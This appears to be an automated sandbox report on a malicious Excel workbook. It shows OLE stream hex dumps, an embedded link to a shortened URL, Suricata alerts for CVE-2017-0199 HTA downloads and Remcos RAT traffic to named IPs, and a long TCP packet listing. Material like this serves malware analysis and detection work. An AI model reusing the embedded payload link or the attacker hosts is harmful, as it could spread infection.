                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . M . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y d t . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . W P S O f f i c e . . @ . . . . E . w . @ . . . . . 2 . @ . . . . D . . . . . . . . . . G . . . . M . . . . . . . . ? . . . . . . . . . | & . . . . . . . . . . . . . . & . . . " W M F C . . . . .
                                                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 4d 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 74 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
                                                                                                                                                                              Stream Path: MBD002DCAA0/MBD0025715C/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 95624
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/MBD0025715C/Workbook
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                              Stream Size:95624
                                                                                                                                                                              Entropy:3.890226646734135
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . Q | 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . .
                                                                                                                                                                              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Stream Path: MBD002DCAA0/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 170317
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA0/Workbook
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                              Stream Size:170317
                                                                                                                                                                              Entropy:7.463658349807208
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
                                                                                                                                                                              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Stream Path: MBD002DCAA1/\x1Ole, File Type: data, Stream Size: 902
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:MBD002DCAA1/\x1Ole
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:902
                                                                                                                                                                              Entropy:5.554474880156939
                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                              Data ASCII:. . . . w r h , } . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . j . f . m . . . c . o . m . . . c . o . / . k . 3 . l . ? . & . a . l . l . o . y . = . h . a . n . d . s . o . m . e . & . c . o . n . v . e . c . t . i . o . n . = . p . a . n . i . c . k . y . & . a . c . i . d . = . g . i . d . d . y . & . p . o . s . i . t . i . o . n . = . a . b . s . o . r . b . i . n . g . & . r . e . g . u . l . a . r . = . o . r . a . n . g . e . & . d . a . t . a . b . a . s . e . =
                                                                                                                                                                              Data Raw:01 00 00 02 77 af a4 72 68 2c ca 7d 00 00 00 00 00 00 00 00 00 00 00 00 ec 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b e8 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6a 00 66 00 6d 00 2e 00 63 00 6f 00 6d 00 2e 00 63 00 6f 00 2f 00 6b 00 33 00 6c 00 3f 00 26 00 61 00 6c 00 6c 00 6f 00 79 00 3d 00 68 00 61 00 6e 00 64 00 73 00 6f 00 6d 00 65 00 26 00 63 00
                                                                                                                                                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 226244
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:Workbook
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                              Stream Size:226244
                                                                                                                                                                              Entropy:7.997732172342711
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . L y 5 . [ . . ` : 1 l ` ( . R y . . q . . 8 " < ! . . . . . . . 7 . . . \\ . p . . . Q i t w A { . P W . p J 1 ? @ X h / . . . h L . f . . [ . g . 2 . N | g . . . . . T . . ] / C $ A } % c N z # & Y Y { q . B . . . [ a . . . & . . . = . . . . $ W . . . 1 V 1 } M m " 6 . . . U . . . . . . . . . . . . . . . . C . . . = . . . 5 . . $ _ } s @ . . . . e . . . . . " . . . . . . . . . 5 . . . . . . . w 1 . . . . . - p . 0 n J . Z d N . O 1 . . . B . . > . } }
                                                                                                                                                                              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 4c 79 35 08 98 5b fe 1c ac 07 8c 60 e7 3a f3 e7 b9 31 6c 8f 60 28 0c 80 ff fb ff 52 8b 79 bc 91 02 05 9f 71 0b 0d 38 89 d5 22 db 3c 9a fe 21 99 e1 00 02 00 b0 04 c1 00 02 00 fc 37 e2 00 00 00 5c 00 70 00 a1 7f 80 88 05 51 ec ed 69 d0 74 81 77 41 7b 07 50 57 f2 9b 05 70 d7 fc 4a 31 3f 40 ff b2
                                                                                                                                                                              Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 527
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Stream Size:527
                                                                                                                                                                              Entropy:5.223213255583526
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:I D = " { 5 4 1 B C 8 E 7 - 0 C B 5 - 4 E 8 1 - B 0 F 4 - 9 A 4 2 5 C 1 D F 6 C 6 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 5 9 7 6 C B 2 A C D 0 B 0 D 0 B
                                                                                                                                                                              Data Raw:49 44 3d 22 7b 35 34 31 42 43 38 45 37 2d 30 43 42 35 2d 34 45 38 31 2d 42 30 46 34 2d 39 41 34 32 35 43 31 44 46 36 43 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                                                                                                              Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:104
                                                                                                                                                                              Entropy:3.0488640812019017
                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                                                                                                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                                                                                                                              Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:2644
                                                                                                                                                                              Entropy:4.001922512755346
                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                              Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                                                                                                              Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                                                                                                              Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                                                                                                                                                                              General
                                                                                                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                                                                                              CLSID:
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Stream Size:553
                                                                                                                                                                              Entropy:6.368143979425921
                                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                                              Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
                                                                                                                                                                              Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 c9 f2 1e 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                                                                                              Network Behavior

                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                              2024-10-14T11:05:44.110782+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249162192.3.220.4080TCP
                                                                                                                                                                              2024-10-14T11:05:44.110820+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1192.3.220.4080192.168.2.2249162TCP
                                                                                                                                                                              2024-10-14T11:05:46.327952+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164192.3.220.4080TCP
                                                                                                                                                                              2024-10-14T11:05:46.327953+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1192.3.220.4080192.168.2.2249164TCP
                                                                                                                                                                              2024-10-14T11:06:06.412128+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249171192.3.220.4080TCP
                                                                                                                                                                              2024-10-14T11:06:08.509149+02002049038ET MALWARE Malicious Base64 Encoded Payload In Image1185.199.108.133443192.168.2.2249167TCP
                                                                                                                                                                              2024-10-14T11:06:09.576932+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M11192.3.220.4080192.168.2.2249172TCP
                                                                                                                                                                              2024-10-14T11:06:09.576932+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M11192.3.220.4080192.168.2.2249172TCP
                                                                                                                                                                              2024-10-14T11:06:13.282795+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249173135.148.195.2486875TCP
                                                                                                                                                                              2024-10-14T11:06:14.272151+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249174135.148.195.2486875TCP
                                                                                                                                                                              2024-10-14T11:06:14.702051+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.2249175178.237.33.5080TCP
                                                                                                                                                                              2024-10-14T11:06:24.551621+02002049038ET MALWARE Malicious Base64 Encoded Payload In Image1185.199.108.133443192.168.2.2249176TCP
                                                                                                                                                                              2024-10-14T11:06:25.520311+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M11192.3.220.4080192.168.2.2249177TCP
                                                                                                                                                                              2024-10-14T11:06:25.520311+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M11192.3.220.4080192.168.2.2249177TCP

                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                              TCP Packets

                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Oct 14, 2024 11:05:42.890017033 CEST49161443192.168.2.22150.136.81.248
                                                                                                                                                                              Oct 14, 2024 11:05:42.890064955 CEST44349161150.136.81.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:42.890139103 CEST49161443192.168.2.22150.136.81.248
                                                                                                                                                                              Oct 14, 2024 11:05:42.895869970 CEST49161443192.168.2.22150.136.81.248
                                                                                                                                                                              Oct 14, 2024 11:05:42.895883083 CEST44349161150.136.81.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:43.381308079 CEST44349161150.136.81.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:43.381402016 CEST49161443192.168.2.22150.136.81.248
                                                                                                                                                                              Oct 14, 2024 11:05:43.386348963 CEST49161443192.168.2.22150.136.81.248
                                                                                                                                                                              Oct 14, 2024 11:05:43.386357069 CEST44349161150.136.81.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:43.386704922 CEST44349161150.136.81.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:43.386769056 CEST49161443192.168.2.22150.136.81.248
                                                                                                                                                                              Oct 14, 2024 11:05:43.472100973 CEST49161443192.168.2.22150.136.81.248
                                                                                                                                                                              Oct 14, 2024 11:05:43.515448093 CEST44349161150.136.81.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:43.579303980 CEST44349161150.136.81.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:43.579371929 CEST49161443192.168.2.22150.136.81.248
                                                                                                                                                                              Oct 14, 2024 11:05:43.579410076 CEST44349161150.136.81.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:43.579451084 CEST49161443192.168.2.22150.136.81.248
                                                                                                                                                                              Oct 14, 2024 11:05:43.579454899 CEST44349161150.136.81.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:43.579488993 CEST49161443192.168.2.22150.136.81.248
                                                                                                                                                                              Oct 14, 2024 11:05:43.579536915 CEST44349161150.136.81.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:43.579653025 CEST49161443192.168.2.22150.136.81.248
                                                                                                                                                                              Oct 14, 2024 11:05:43.581335068 CEST49161443192.168.2.22150.136.81.248
                                                                                                                                                                              Oct 14, 2024 11:05:43.581352949 CEST44349161150.136.81.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:43.587402105 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:43.592413902 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:43.592478037 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:43.592744112 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:43.597613096 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.110711098 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.110760927 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.110781908 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.110806942 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.110820055 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.110856056 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.110862970 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.110892057 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.110898018 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.110927105 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.110934019 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.110960960 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.110966921 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.110996962 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.111001015 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.111031055 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.111042023 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.111066103 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.111068964 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.111112118 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.116242886 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.116292953 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.116298914 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.116338015 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.116347075 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.116415977 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.116852999 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205040932 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205104113 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205135107 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205141068 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205152988 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205177069 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205188990 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205215931 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205226898 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205249071 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205257893 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205285072 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205290079 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205329895 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205339909 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205374002 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205385923 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205409050 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205414057 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205445051 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205449104 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205478907 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205487967 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205521107 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205533028 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205565929 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205575943 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205602884 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205609083 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205636024 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205643892 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205670118 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205678940 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205704927 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205713987 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205743074 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205754995 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205785036 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205909014 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205943108 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205951929 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.205977917 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.205988884 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.206012964 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.206018925 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.206053972 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.210711956 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.210767984 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.210783005 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.210808039 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.297951937 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298018932 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298053980 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298085928 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298086882 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298119068 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298120975 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298125982 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298166990 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298172951 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298223019 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298229933 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298259020 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298274040 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298301935 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298309088 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298341990 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298353910 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298374891 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298388958 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298410892 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298424959 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298444986 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:05:44.298465014 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:05:44.298477888 CEST8049162192.3.220.40192.168.2.22
